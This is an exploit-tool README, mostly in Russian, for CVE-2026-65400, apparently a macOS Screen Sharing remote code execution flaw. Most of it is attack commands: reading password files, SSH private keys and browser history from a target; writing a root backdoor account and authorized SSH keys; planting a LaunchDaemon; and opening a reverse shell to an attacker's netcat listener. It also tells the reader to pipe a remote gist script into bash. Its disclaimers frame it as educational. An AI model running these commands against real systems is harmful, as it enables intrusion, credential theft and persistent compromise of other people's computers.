## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-HORKIMHAB-CVE-2026-65400
# CVE-2026-65400
## Пожертвовать
Поддержите сопровождение этого проекта через PayPal или отсканировав QR-код ниже.


## ⚡ Простое использование
Используйте этот проект только в безопасных и авторизованных средах, таких как:
* Локальные виртуальные машины
* Контейнеры Docker
* Изолированные лабораторные среды
* Авторизованные среды тестирования на проникновение
Пример настройки:
root@kitploit:~
git clone <repository-url>
cd <repository-name>
# Project use python follow below
# Create a virtual environment
python -m venv venv
# Activate the virtual environment
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# Install requirments
pip install -r requirements.txt
Пример использования:
root@kitploit:~
# Read a File from Target
# Read /etc/passwd and display it
python3 exploit.py read -u root 192.168.1.100 /etc/passwd
# Read and save to a local file
python3 exploit.py read -u root 192.168.1.100 /etc/passwd -o passwd.txt
# Read a user's file
python3 exploit.py read -u root 192.168.1.100 /Users/admin/Documents/secret.txt
# Write a File to Target
# Write a local file to target
python3 exploit.py write -u root 192.168.1.100 /tmp/test.txt myfile.txt
# Write with specific permissions (0600 for crontab)
python3 exploit.py write -u root 192.168.1.100 /tmp/secret data.txt -m 0600
# Write from stdin
echo "hello world" | python3 exploit.py write -u root 192.168.1.100 /tmp/test.txt -
# Get a Reverse Shell (SIP Disabled Only)
# On your attacker machine, start a listener in another terminal
nc -nlvp 4444
# Run the exploit
python3 exploit.py exec -u root 192.168.1.100 192.168.1.50 4444
# Where:
# 192.168.1.100 = target Mac IP
# 192.168.1.50 = your attacker IP
# 4444 = port for reverse shell
# Example 1: Reading System Files
# Read the shadow file (if accessible)
python3 exploit.py read -u root 192.168.1.100 /var/db/dslocal/nodes/Default/users/admin.plist -o admin.plist
# Read Safari history
python3 exploit.py read -u root 192.168.1.100 /Users/admin/Library/Safari/History.db -o history.db
# Read SSH keys (if they exist)
python3 exploit.py read -u root 192.168.1.100 /Users/admin/.ssh/id_rsa -o id_rsa
# Example 2: Writing Files
# Create a backdoor user
echo "backdoor:*:0:0:Backdoor:/var/root:/bin/bash" > backdoor.txt
python3 exploit.py write -u root 192.168.1.100 /private/etc/passwd backdoor.txt
# Inject SSH key
python3 exploit.py write -u root 192.168.1.100 /Users/admin/.ssh/authorized_keys ~/.ssh/id_rsa.pub
# Write a startup script
python3 exploit.py write -u root 192.168.1.100 /Library/LaunchDaemons/com.backdoor.plist backdoor.plist
# Example 3: SIP Detection
python3 exploit.py exec -u root 192.168.1.100 192.168.1.50 4444
# Output if SIP is enabled:
# [!] SIP is enabled - crontab injection will fail
# [!] Try using the read/write commands instead
# Output if SIP is disabled:
# [*] SIP is disabled - proceeding with RCE
# [+] Wrote shell script to /var/tmp/.r
# [+] Wrote crontab to /var/at/tabs/root
# [*] Reverse shell should connect to 192.168.1.50:4444 within 60 seconds
# Authentication Bypass Retry
# Increase retry count if it fails
python3 exploit.py read -u root 192.168.1.100 /etc/passwd -r 50
# Port Specification
python3 exploit.py read -u root 192.168.1.100 /etc/passwd -p 5901
Примечание:
* при клонировании из другого проекта вы должны выполнить `curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y`, чтобы удалить вложенный каталог .git
* например: cve-2025-46822.sh, cve-2025-46822-lab.sh, ...
* * *
## Авторство и ссылки
* https://warez.sl0p.foo/apple-screensharing-rce/
* https://blog.calif.io/p/no-country-for-old-passwords
* * *
# 📚 Образовательный репозиторий по исследованию безопасности
Репозиторий для изучения, тестирования и исследования концепций кибербезопасности в контролируемых средах.
* * *
## ⚠️ Отказ от ответственности и правовая информация
## Цель
Этот репозиторий предназначен **только для образовательных целей и авторизованных исследований в области безопасности**.
Он создан, чтобы помочь пользователям изучить:
* Уязвимости безопасности
* Концепции песочницы и изоляции
* Безопасное программирование и методы защиты
* * *
## Только авторизованное использование
Используйте этот репозиторий только в средах, где у вас есть разрешение, например:
* Личные лаборатории или виртуальные машины
* Docker или изолированные среды
* Авторизованное тестирование на проникновение
* Обучение кибербезопасности или академические исследования
Неавторизованное или незаконное использование строго запрещено.
* * *
## Отсутствие ответственности
Автор и участники **не несут ответственности** за любой ущерб, неправомерное использование, юридические проблемы или убытки, вызванные этим проектом.
Используя этот репозиторий, вы соглашаетесь с тем, что:
* Вы несёте ответственность за свои действия
* Вы будете использовать его законно и этично
* Проект предоставляется **без каких-либо гарантий**
* * *
## Этичное использование
Этот проект предназначен для:
* Исследований в области защитной безопасности
* Образования в области кибербезопасности
* Повышения осведомлённости об уязвимостях
* Исследований безопасных систем и программного обеспечения
Пожалуйста, соблюдайте практики ответственного раскрытия информации и действуйте в соответствии со всеми применимыми законами.
* * *
## Контакты
Для ответственного раскрытия информации или сотрудничества свяжитесь с сопровождающим репозитория через GitHub.
* * *
## Связанный проект
Ознакомьтесь с PoC CVE Collection для получения дополнительных PoC-ресурсов по CVE, предназначенных для авторизованных исследований в области безопасности и образования.